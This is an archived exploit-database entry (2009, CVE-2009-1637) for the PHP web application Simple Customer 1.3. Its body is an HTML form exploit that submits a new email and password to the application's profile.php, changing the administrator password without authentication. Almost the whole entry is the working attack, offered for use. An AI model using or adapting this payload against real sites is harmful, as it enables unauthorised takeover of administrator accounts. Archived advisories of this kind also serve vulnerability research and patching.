EXPLOITS

Simple Customer 1.3 - Arbitrary Change Admin Password

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-05-06  
date_updated:   
verified: 1  
codes: OSVDB-54280;CVE-2009-1637  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8638.html  

                 ---- Remote Change admin Password----
----------------------------
script:Simple Customer 1.3
----------------------------
Author: ahmadbady
email:kivi_hacker666@yahoo.com

--------------------
download from:http://www.simplecustomer.com/  New (Version 1.3)

--------------------
xpl:



</head>
<body>
<form action="http://www.simplecustomer.com/demo/profile.php" method="post">
<div class="container">
  <div class="leftcolumn">
    <h2>coded by ahmadbady</h2>
    </span>
    <form id="form1" name="form1" method="post" action="">
      <p>Email
        <br />
        <input name="email" type="text" id="email" value="" class="required validate-email" size="35" />
      </p>
      <p><br />
        <input name="password" type="password" id="password" />
          <br />
      </p>
      <p>Home Page<br />
        <input name="Submit2" type="submit" id="Submit2" value="Update" />
        </p>
    </form>

# milw0rm.com [2009-05-07]